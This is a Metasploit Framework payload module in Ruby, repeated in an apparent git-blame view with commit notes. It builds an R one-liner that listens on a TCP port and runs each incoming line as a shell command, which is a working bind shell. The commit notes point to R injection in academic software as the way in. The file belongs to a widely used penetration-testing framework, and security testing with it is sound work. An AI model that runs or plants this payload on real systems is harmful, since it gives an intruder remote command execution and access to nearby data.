metasploit-framework/modules/payloads/singles/r/shell_bind_tcp.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/payload/r'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module MetasploitModule

  CachedSize = 125

  include Msf::Payload::Single
  include Msf::Payload::R
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'        => 'R Command Shell, Bind TCP',
      'Description' => 'Continually listen for a connection and spawn a command shell via R',
      'Author'      => [ 'RageLtMan' ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'r',
      'Arch'        => ARCH_R,
      'Handler'     => Msf::Handler::BindTcp,
      'Session'     => Msf::Sessions::CommandShell,
      'PayloadType' => 'r',
      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
    ))
  end

  def generate
    return prepends(r_string)
  end

  def r_string
    return "s<-socketConnection(port=#{datastore['LPORT']}," +
    "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
    "(pipe(readLines(s,1))),s)}"
  end
end
Reverse and bind shells in R Initial implementation of bind and reverse TCP shells in R. Supports IPv4 and 6, provides stateless sessions which wont change the cwd when cd is invoked since each command invocation actually spawns a pipe to execute that specific line's invocation. R injections are common in academic software written in a hurry by students or lab administrators. The language runtimes are also commonly found adjacent to valuable data, and often used by teams which are not directly responsible for information security. Testing: Local testing with netcat bind and rev handlers. TODO: Add the appropriate platform/language library definitions 2017-08-19 09:57:45 +00:00			`##`
			`# This module requires Metasploit: https://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core/payload/r'`
			`require 'msf/core/handler/bind_tcp'`
			`require 'msf/base/sessions/command_shell'`
			`require 'msf/base/sessions/command_shell_options'`

			`module MetasploitModule`

update R cached sizes 2017-08-28 10:30:30 +00:00			`CachedSize = 125`
Reverse and bind shells in R Initial implementation of bind and reverse TCP shells in R. Supports IPv4 and 6, provides stateless sessions which wont change the cwd when cd is invoked since each command invocation actually spawns a pipe to execute that specific line's invocation. R injections are common in academic software written in a hurry by students or lab administrators. The language runtimes are also commonly found adjacent to valuable data, and often used by teams which are not directly responsible for information security. Testing: Local testing with netcat bind and rev handlers. TODO: Add the appropriate platform/language library definitions 2017-08-19 09:57:45 +00:00
			`include Msf::Payload::Single`
			`include Msf::Payload::R`
			`include Msf::Sessions::CommandShellOptions`

			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'R Command Shell, Bind TCP',`
			`'Description' => 'Continually listen for a connection and spawn a command shell via R',`
			`'Author' => [ 'RageLtMan' ],`
			`'License' => MSF_LICENSE,`
			`'Platform' => 'r',`
			`'Arch' => ARCH_R,`
			`'Handler' => Msf::Handler::BindTcp,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'PayloadType' => 'r',`
			`'Payload' => { 'Offsets' => {}, 'Payload' => '' }`
			`))`
			`end`

			`def generate`
			`return prepends(r_string)`
			`end`

			`def r_string`
			`return "s<-socketConnection(port=#{datastore['LPORT']}," +`
			`"blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +`
			`"(pipe(readLines(s,1))),s)}"`
			`end`
			`end`